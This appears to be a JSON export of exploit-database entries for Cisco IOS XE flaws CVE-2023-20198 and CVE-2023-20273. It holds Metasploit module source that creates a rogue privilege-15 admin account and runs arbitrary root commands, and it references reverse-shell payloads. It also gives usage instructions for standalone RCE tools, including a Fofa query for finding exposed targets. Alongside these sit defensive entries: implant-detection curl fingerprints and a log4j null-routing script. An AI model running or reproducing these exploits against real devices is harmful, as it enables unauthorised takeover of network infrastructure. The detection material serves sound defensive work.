'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], \n# Technical details on CVE-2023-20198. \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'], \n# Technical details on CVE-2023-20273. \n['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'] \n], \n'DisclosureDate' => '2023-10-16', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('CMD', [ true, 'The OS command to execute.', 'id']), \nOptString.new('CISCO_ADMIN_USERNAME', [false, 'The username of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin account.']), \nOptString.new('CISCO_ADMIN_PASSWORD', [false, 'The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.']), \nOptInt.new('REMOVE_OUTPUT_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to removing the commands output file.', 30]) \n] \n) \nend \n \ndef run \n# If the user has supplied a username/password, we can use these creds to leverage CVE-2023-20273 and execute an OS \n# command. If a username/password have not been supplied, we can leverage CVE-2023-20198 to create a new admin \n# account, and then leverage CVE-2023-20273 to execute an OS command. This opens up the ability to leverage the \n# auxiliary module for CVE-2023-20198 to create a new admin account once, then use those new admin creds in this \n# module to execute multiple OS command without the need to create a new 'temporary' admin account for every \n# invocation of this module (which will reduce the noise in the devices logs). \nif !datastore['CISCO_ADMIN_USERNAME'].blank? && !datastore['CISCO_ADMIN_PASSWORD'].blank? \nexececute_os_command(datastore['CISCO_ADMIN_USERNAME'], datastore['CISCO_ADMIN_PASSWORD']) \nelse \nadmin_username = Rex::Text.rand_text_alpha(8) \nadmin_password = Rex::Text.rand_text_alpha(8) \n \nunless run_cli_command(\"username #{admin_username} privilege 15 secret #{admin_password}\", Mode::GLOBAL_CONFIGURATION) \nprint_error('Failed to create admin user') \nreturn \nend \n \nbegin \nvprint_status(\"Created privilege 15 user '#{admin_username}' with password '#{admin_password}'\") \n \nexececute_os_command(admin_username, admin_password) \nensure \nvprint_status(\"Removing user '#{admin_username}'\") \n \nunless run_cli_command(\"no username #{admin_username}\", Mode::GLOBAL_CONFIGURATION) \nprint_warning('Failed to remove user') \nend \nend \nend \nend \n \ndef exececute_os_command(admin_username, admin_password) \nout_file = Rex::Text.rand_text_alpha(8) \n \ncmd = \"$(openssl enc -base64 -d <<< #{Base64.strict_encode64(datastore['CMD'])}) &> /var/www/#{out_file}\" \n \nunless run_os_command(cmd, admin_username, admin_password) \nprint_error('Failed to run command') \nreturn \nend \n \nbegin \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri('webui', out_file), \n'headers' => { \n'Authorization' => basic_auth(admin_username, admin_password) \n} \n) \n \nunless res&.code == 200 \nprint_error('Failed to get command output') \nreturn \nend \n \nprint_line(res.body) \nensure \nvprint_status(\"Removing output file '/var/www/#{out_file}'\") \n \n# Deleting the output file can take more than one attempt. \nsuccess = retry_until_truthy(timeout: datastore['REMOVE_OUTPUT_TIMEOUT']) do \nif run_os_command(\"rm /var/www/#{out_file}\", admin_username, admin_password) \nnext true \nend \n \nvprint_status('Failed to delete output file, waiting and trying again...') \nfalse \nend \n \nunless success \nprint_error(\"Failed to delete output file '/var/www/#{out_file}\") \nprint_error(out_file) \nend \nend \nend \nend \n`\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180889/cisco_ios_xe_os_exec_cve_2023_20273.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180889"
},
{
"lastseen": "2024-09-15T11:06:53",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2021-44228"
],
"description": "# log4j-nullroute\nQuick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Arista EOS.\n\nUse the exceptions file to omit any IPs you find in the list that you do not want to null route.\n\nRequired fill-ins for vars:\n\nsecrets.py\n------------\nusername, password, api_key\n\nnullroute.py\n-------------\nedge_routers",
"modified": "2024-08-12T20:18:50",
"id": "BE66A9B6-104B-5F49-918A-8B913CE46473",
"published": "2021-12-13T03:15:42",
"href": "https://github.com/0xRyan/log4j-nullroute",
"type": "githubexploit",
"title": "Exploit for Expression Language Injection in Apache Log4J",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/BE66A9B6-104B-5F49-918A-8B913CE46473"
},
{
"lastseen": "2024-07-15T18:18:07",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Fofa\n\n```\nbody=\"<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>\" && is_honeypot=false && is_fraud=false\n```\n\n# Usage\n\n```\nusage: CVE-2023-20198-RCE.py [-h] -u URL [-p PROXY] [-au ADD_USER] [-ap ADD_PASS] [-du DEL_USER] [-pm PRIVILEGE_MODE]\n [-em EXPLOIT_MODE] [-oc OS_CMD] [-cc CLI_CMD]\n\nCVE-2023-20198-RCE\n\noptions:\n -h, --help show this help message and exit\n -u URL, --url URL target url to check, eg: http://example.com\n -p PROXY, --proxy PROXY\n proxy url, eg: http://127.0.0.1:8083\n -au ADD_USER, --add-user ADD_USER\n username to add.If left blank, an 8-digit mixed case English string will be randomly\n generated.\n -ap ADD_PASS, --add-pass ADD_PASS\n password to add.If left blank, an 8-digit mixed case English string will be randomly\n generated.\n -du DEL_USER, --del-user DEL_USER\n username to delete\n -pm PRIVILEGE_MODE, --privilege-mode PRIVILEGE_MODE\n user/privileged\n -em EXPLOIT_MODE, --exploit-mode EXPLOIT_MODE\n user/cmd\n -oc OS_CMD, --os-cmd OS_CMD\n exec os command\n -cc CLI_CMD, --cli-cmd CLI_CMD\n exec cli command\n```\n\nFor example:\n\n```powershell\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -pm privileged -cc \"show version\" \n\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -oc \"uname -a\" \n\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au -ap\n\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au hahahahha -ap hahahahha\n\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -du aaaaaa\n\n```\n\n![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240425153133359.png)\n",
"modified": "2024-07-15T13:33:36",
"id": "0004572D-8F1A-5FA0-B583-57259E099827",
"published": "2024-04-25T06:59:53",
"href": "https://github.com/W01fh4cker/CVE-2023-20198-RCE",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/0004572D-8F1A-5FA0-B583-57259E099827"
},
{
"lastseen": "2024-07-02T22:16:07",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nAn Exploitation script developed to exploit the CVE-2023-20198 Cisco zero day vulnerability on their IOS XE\n\nHackers have been widely exploiting the this vulnerability which creates a 15 level privilege user by bypassing the authentication\nWhich a malicous xml content make this exploitation the webui endpoint of cisco.This is not only for Exploitation also detects\nvulneable implant for exploitations and The tool can also use for mass detectiona and exploitation!.\n\n# Installation\n```bash\ngit clone https://github.com/sanjai-AK47/CVE-2023-20198.git\ncd CVE-2023-20198\npip install -r requirements.txt\n```\n\n# Usages:\n\n## Modes:\n\n```bash\npython3 exploit.py --help \nusage: exploit.py [-h] {Detect,Exploit} ...\n\n[DESCTIPTION]: Exploitation and Detection tool for Cisco CVE-2023-20198\n\noptions:\n -h, --help show this help message and exit\n\n[MODE]: Exploitation | Detections Modes:\n {Detect,Exploit} [INFO]: Select either Exploit or Detect mode\n Detect [INFO]: Detection mode detect the vulnerable implant to exploit\n Exploit [INFO]: Exploitation mode exploit the vulnerable implant of CVE-2023-20198\n\n```\n\n## Detection:\n\n```bash\npython3 exploit.py Detect -h \nusage: exploit.py Detect [-h] [-d DOMAIN] [-dL DOMAINS_LIST] [-px PROXY] [-to TIME_OUT] [-o OUTPUT] [-v]\n\noptions:\n -h, --help show this help message and exit\n -d DOMAIN, --domain DOMAIN\n [INFO]: Target domain for exploiting without protocol eg:(www.domain.com)\n -dL DOMAINS_LIST, --domains-list DOMAINS_LIST\n [INFO]: Targets domain for exploiting without protocol eg:(www.domain.com)\n -px PROXY, --proxy PROXY\n [INFO]: Switiching proxy will send request to your configured proxy (eg: BURPSUITE)\n -to TIME_OUT, --time-out TIME_OUT\n [INFO]: Switiching timeout will requests till for your timeout and also for BURPSUITE\n -o OUTPUT, --output OUTPUT\n [INFO]: File name to save output\n -v, --verbose [INFO]: Switching verbose will shows failed and offline targets\n\n\n```\n## Exploitation\n\n```bash\npython3 exploit.py Exploit -h \nusage: exploit.py Exploit [-h] [-cfc CONFIG_CONTENT] [-d DOMAIN] [-dL DOMAINS_LIST] [-px PROXY] [-to TIME_OUT] [-o OUTPUT] [-v]\n\noptions:\n -h, --help show this help message and exit\n -cfc CONFIG_CONTENT, --config-content CONFIG_CONTENT\n [INFO]: Customized config contents for exploitation\n -d DOMAIN, --domain DOMAIN\n [INFO]: Target domain for exploiting without protocol eg:(www.domain.com)\n -dL DOMAINS_LIST, --domains-list DOMAINS_LIST\n [INFO]: Targets domain for exploiting without protocol eg:(www.domain.com)\n -px PROXY, --proxy PROXY\n [INFO]: Switiching proxy will send request to your configured proxy (eg: BURPSUITE)\n -to TIME_OUT, --time-out TIME_OUT\n [INFO]: Switiching timeout will requests till for your timeout and also for BURPSUITE\n -o OUTPUT, --output OUTPUT\n [INFO]: File name to save output\n -v, --verbose [INFO]: Switching verbose will shows failed and offline targets\n\n```\n\n# Information:\n\nSince the exploitation and detection tool is developed by theoritical poc by [Horizona3](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/Imp which is help me to develop this \ntool for this CVE and for detection it can detect the vulnerable cisco implant but for proper exploitation users needs to pass the malicous XML content that is is theoritical poc of horizona3 need\nto be given by users for exploitations because of only theoritical explaination have to do this but soon after proper information and resources will upgrade this exploitation and detection Tool\n\n\n# Warning:\nImportant thing if any unethical exploitation the I'm not responsible for any illegal actions so plese use this for ethical and legal \npurposes\n\nProof of conept Developed by [D.Sanjai Kumar](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) with \u2665\ufe0f for any upgrade and miscoded contact me throguh my [LinkedIn](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/).\nThank you!\n\n\n\n\n\n\n\n",
"modified": "2024-07-02T20:29:59",
"id": "AF4F20F9-F1D7-5E63-BD2F-2BE8017C5213",
"published": "2023-11-03T13:05:59",
"href": "https://github.com/sanjai-AK47/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/AF4F20F9-F1D7-5E63-BD2F-2BE8017C5213"
},
{
"lastseen": "2024-06-05T17:29:24",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198-RCE\nCVE-2023-20198-RCE, support adding/deleting users and executing cli commands/system commands.\n# Usage\nCVE-2023-20198-RCE.py [-h] -u URL [-p PROXY] [-au ADD_USER] [-ap ADD_PASS] [-du DEL_USER] [-pm PRIVILEGE_MODE]\n [-em EXPLOIT_MODE] [-oc OS_CMD] [-cc CLI_CMD]\n\nCVE-2023-20198-RCE\n\noptions:\n -h, --help show this help message and exit\n -u URL, --url URL target url to check, eg: http://example.com\n -p PROXY, --proxy PROXY\n proxy url, eg: http://127.0.0.1:8083\n -au ADD_USER, --add-user ADD_USER\n username to add.If left blank, an 8-digit mixed case English string will be randomly\n generated.\n -ap ADD_PASS, --add-pass ADD_PASS\n password to add.If left blank, an 8-digit mixed case English string will be randomly\n generated.\n -du DEL_USER, --del-user DEL_USER\n username to delete\n -pm PRIVILEGE_MODE, --privilege-mode PRIVILEGE_MODE\n user/privileged\n -em EXPLOIT_MODE, --exploit-mode EXPLOIT_MODE\n user/cmd\n -oc OS_CMD, --os-cmd OS_CMD\n exec os command\n -cc CLI_CMD, --cli-cmd CLI_CMD\n exec cli command\n",
"modified": "2024-05-29T11:13:41",
"id": "70A262CE-4967-5480-9A9B-FA07CF9A9EA0",
"published": "2024-04-28T01:25:41",
"href": "https://github.com/Codeb3af/CVE-2023-20198-RCE",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/70A262CE-4967-5480-9A9B-FA07CF9A9EA0"
},
{
"lastseen": "2024-08-11T05:02:30",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273",
"CVE-2019-20198"
],
"description": "# Cisco IOS XE implant scanning & network detection\nNetwork detection of `CVE-2023-20198` exploitation and fingerprinting of post-exploitation of Cisco IOS XE devices.\n\n## CVE-2023-20198 Suricata network detection\nThe [suricata/](suricata/) folder contains Suricata detection rules for exploitation of `CVE-2023-20198`. These rules monitor for a percent-encoded-percent which can be used to bypass authentication on Cisco IOS XE devices not patched for `CVE-2023-20198`.\n\nThis directory also contains reference PCAPs based on observed in-the-wild exploitation traffic:\n\n* [fox-it-cisco-cve-2023-20198-auth-bypass-wsma-exec.pcap](suricata/fox-it-cisco-cve-2023-20198-auth-bypass-wsma-exec.pcap?raw=true) -- CVE-2019-20198 exploit with wsma-exec\n* [fox-it-cisco-cve-2023-20198-auth-bypass-wsma-config.pcap](suricata/fox-it-cisco-cve-2023-20198-auth-bypass-wsma-config.pcap?raw=true) -- CVE-2019-20198 exploit with wsma-config\n\n## Cisco IOS XE implant scanning\nThis repository also contains information regarding post-exploitation activities linked to the Cisco IOS XE Software Web Management User Interface mass exploitations. Cisco Talos [^1] published a fingerprint that could check if the implant was active on Cisco IOS XE devices. For reference:\n\n```shell\ncurl -k -X POST \"https://DEVICEIP/webui/logoutconfirm.html?logon_hash=1\"\n```\n\nIf the HTTP response consists of a hexadecimal string, this is a high-confidence indicator that the device is compromised. However, as multiple sources have mentioned [^2] [^3], the number of implants that can be discovered using this method has gone down significantly.\n\n## Upgraded Implant\n\nInvestigated network traffic to a compromised device has shown that the threat actor has upgraded the implant to do an extra header check.\nThus, for a lot of devices, the implant is still active, but now only responds if the correct `Authorization` HTTP header is set.\n\n## Alternate method for Cisco IOS XE implant scanning\n\nWe took another look at the [initial blogpost by Cisco Talos](https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/) and noticed an extra location check in the implant code:\n\n![implant-location-percent](implant-location-percent.png?raw=true \"Extra location check\")\n\nBased on the above screenshot of the implant code shared by Cisco Talos we found another method that can be used to fingerprint the presence of the implant.\n\n```shell\ncurl -k \"https://DEVICEIP/%25\"\n```\nUsing the `%25` (percent encoded percent), we meet the conditions specified in the extra location check. This will cause the server to respond with a different HTTP response than it normally would when the implant is not running.\n\nThere are currently three known versions of the implant. As of 1 November 2023, the implant is named `BadCandy` by Cisco Talos [^1].\n\n### BadCandy Implant v1 / v2 response\nA telltale of implant operation is a `<head><title>404 Not Found</title></head>` in the body. An example HTTP body is as such:\n\n```html\n$ curl -k 'https://DEVICEIP/%25'\n<html>\n<head><title>404 Not Found</title></head>\n<body bgcolor=\"white\">\n<center><h1>404 Not Found</h1></center>\n<hr><center>nginx</center>\n</body>\n</html>\n```\n\n### BadCandy Implant v3 response\nThe third variant returns the login page rather than the 404. As one would still normally expect a javascript redirect rather than this login page, we can still determine the presence of the implant by checking whether or not a login page is returned:\n\n```html\ncurl -k 'https://DEVICEIP/%25'\n<!DOCTYPE html>\n<html>\n <!--\n Copyright (c) 2015-2019 by Cisco Systems, Inc.\n All rights reserved.\n -->\n <head lang=\"en\">\n <meta charset=\"UTF-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n <title id=\"loginTitle\"></title>\n```\n\nWe found different login responses in our scanning results, and ended up with the `name=\"Username\"` string as an identifier to determine whether or not a login page is being returned.\n\n### Other responses\nIf the implant is not present, you will get a different response. For example:\n\n```html\n$ curl -k 'https://DEVICEIP/%25'\n<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>\n```\n\n## Script to check for compromise\n\nWe created a small script that checks for compromise using the above fingerprinting method. Script can be found here:\n\n * [iocisco.py](iocisco.py)\n\nExample usage:\n\n```shell\n$ pip3 install requests\n\n$ python3 iocisco.py 192.168.1.1\n[!] Checking http://192.168.1.1/%25\n WARNING: Possible implant found for 192.168.1.1 (impant v3)! Please perform a forensic investigation!\n[!] Checking https://192.168.1.1/%25\n WARNING: Possible implant found for 192.168.1.1 (implant v3)! Please perform a forensic investigation!\n```\n\nIt is also possible to scan a list of hosts, seperated by newlines.\n\n```shell\n$ python3 iocisco.py --file cisco-ips.txt\n```\n\n## References\n\n[^1]: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/\n[^2]: https://www.bleepingcomputer.com/news/security/number-of-hacked-cisco-ios-xe-devices-plummets-from-50k-to-hundreds/\n[^3]: https://twitter.com/onyphe/status/1715633541264900217\n",
"modified": "2024-05-10T10:51:53",
"id": "450F4FED-7E81-533C-8064-4FED6D771D93",
"published": "2023-10-23T14:52:18",
"href": "https://github.com/fox-it/cisco-ios-xe-implant-detection",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/450F4FED-7E81-533C-8064-4FED6D771D93"
},
{
"lastseen": "2024-06-05T15:06:03",
"description": "This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE devices which have the Web UI exposed. An attacker can execute a payload with root privileges. The vulnerable IOS XE versions are: 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, 17.11.99SW\n",
"published": "2023-11-06T17:12:40",
"type": "metasploit",
"title": "Cisco IOX XE Unauthenticated RCE Chain",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"modified": "2024-04-15T03:06:50",
"id": "MSF:EXPLOIT-LINUX-MISC-CISCO_IOS_XE_RCE-",
"href": "https://www.rapid7.com/db/modules/exploit/linux/misc/cisco_ios_xe_rce/",
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::CiscoIosXe\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Retry\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cisco IOX XE Unauthenticated RCE Chain',\n 'Description' => %q{\n This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE\n devices which have the Web UI exposed. An attacker can execute a payload with root privileges.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 
17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'sfewer-r7', # MSF Exploit\n ],\n 'References' => [\n ['CVE', '2023-20198'],\n ['CVE', '2023-20273'],\n # Vendor advisories.\n ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],\n ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],\n # Vendor list of (205) vulnerable versions.\n ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],\n # Technical details on CVE-2023-20198.\n ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'],\n ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'],\n # Technical details on CVE-2023-20273.\n ['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'],\n # Full details of a successful exploitation attempt from a honey pot.\n ['URL', 'https://gist.github.com/rashimo/a0ef01bc02e5e9fdf46bc4f3b5193cbf'],\n ],\n 'DisclosureDate' => '2023-10-16',\n 'Privileged' => true,\n 'Platform' => %w[linux unix],\n 'Arch' => [ARCH_CMD],\n 'Targets' => [\n [\n # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:\n # 
cmd/linux/http/x64/meterpreter/reverse_tcp\n # cmd/linux/http/x64/shell/reverse_tcp\n # cmd/linux/http/x86/shell/reverse_tcp\n 'Linux Command',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_CMD]\n },\n ],\n [\n # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:\n # cmd/unix/python/meterpreter/reverse_tcp\n # cmd/unix/reverse_bash\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => [ARCH_CMD]\n },\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n # We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of\n # 'global' should work, but exposing this as an option will allow for usage in more complex network setups.\n # A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to\n # inspect a devices configuration to see an appropriate VRF to use.\n OptString.new('CISCO_VRF_NAME', [ true, \"The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.\", 'global']),\n # We may need to try and execute a command a second time if it fails the first time. 
